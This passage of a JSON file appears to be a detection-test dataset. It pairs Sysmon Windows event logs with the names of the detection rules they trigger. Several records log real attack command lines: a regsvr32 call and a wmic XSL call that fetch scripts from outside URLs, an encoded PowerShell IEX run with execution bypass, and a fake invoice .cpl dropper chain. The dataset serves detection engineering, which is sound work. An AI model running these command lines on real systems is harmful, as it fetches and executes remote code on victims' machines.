17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script 
Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script 
Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 
16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 
07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 
13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler 
on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" 
